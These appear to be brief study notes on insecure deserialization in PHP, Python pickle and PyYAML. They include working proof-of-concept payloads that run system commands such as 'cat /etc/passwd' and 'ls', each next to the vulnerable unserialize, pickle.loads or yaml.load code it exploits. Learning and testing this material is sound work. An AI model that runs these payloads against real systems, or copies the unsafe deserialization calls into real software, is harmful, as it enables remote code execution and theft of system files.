The decoding and transformation of user supplied data into language objects can result in remote code execution.
[ref](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure Deserialization/PHP.md)
-
Look at code
-
Identify functions that do something malicious based on user input. Like:
class Foo{ private $cmd = "ls"; function __toString() { return system($this->cmd); } }
-
Find out where they are executed
$x = unserialize($_GET["data"]); echo $x;
-
Write class that sets parameters to what you want. Methods cannot be overridden.
class Foo{ private $cmd = "cat /etc/passwd"; }
-
Instantiate and serialize class
$f = new Foo(); echo serialize($f);
Things to note:
- You cannot override methods
- You do not need to deserialize to a class that is correct, any class will do as long as it is loaded by the compiler
pickle — Python object serialization — Python 3.9.4 documentation
Vulnerable code:
# Attacker's code
import os
import pickle
class Exploit:
def __reduce__(self):
# os doesn't need to be imported on the victim
return os.system, ("cat /etc/passwd",)
pic = pickle.dumps(Exploit())
# Victim's code
data = pickle.loads(pic)Notes:
- Python version must match
- All python versions are vulnerable
Payload:
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- [ "print(__import__('os').system('ls'))" ]Vulnerable code:
import yaml
yaml.load(payload)